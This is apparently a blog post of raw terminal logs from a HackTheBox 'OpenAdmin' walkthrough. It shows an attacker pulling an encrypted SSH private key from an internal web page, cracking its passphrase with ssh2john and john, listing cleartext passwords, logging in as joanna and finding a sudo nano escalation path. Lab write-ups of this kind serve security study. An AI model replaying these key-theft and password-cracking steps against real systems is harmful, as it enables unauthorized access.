jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-available/internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre>
<pre>-rw------- 1 joanna joanna 1766 Nov 23 16:35 /home/joanna/.ssh/id_rsa
</pre>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
kali@kali:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/pri_ssh
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
kali@kali:~/Desktop$ /usr/share/john/ssh2john.py ~/Desktop/pri_ssh
/home/kali/Desktop/pri_ssh:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d
kali@kali:~/Desktop$ /usr/share/john/ssh2john.py ~/Desktop/pri_ssh > ~/Desktop/pri_ssh_ok
kali@kali:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/pri_ssh_ok
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (/home/kali/Desktop/pri_ssh)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:03 DONE (2020-04-19 04:40) 0.3278g/s 4702Kp/s 4702Kc/s 4702KC/sa6_123..*7¡Vamos!
Session completed
jimmy n1nj4W4rri0R!
joanna bloodninjas
kali@kali:~$ ssh -i ~/Desktop/pri_ssh joanna@10.10.10.171
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '/home/kali/Desktop/pri_ssh' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "/home/kali/Desktop/pri_ssh": bad permissions
joanna@10.10.10.171's password:
Permission denied, please try again.
joanna@10.10.10.171's password:
Permission denied, please try again.
joanna@10.10.10.171's password:
kali@kali:~$ ^C
kali@kali:~$ chmod 0600 Desktop/pri_ssh
kali@kali:~$ ssh -i ~/Desktop/pri_ssh joanna@10.10.10.171
Enter passphrase for key '/home/kali/Desktop/pri_ssh':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Apr 19 08:46:51 UTC 2020
System load: 0.1 Processes: 124
Usage of /: 49.6% of 7.81GB Users logged in: 2
Memory usage: 21% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Apr 19 08:12:19 2020 from 10.10.14.71
joanna@openadmin:~$
sdfjoanna@openadmin:/etc$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
评论
发表评论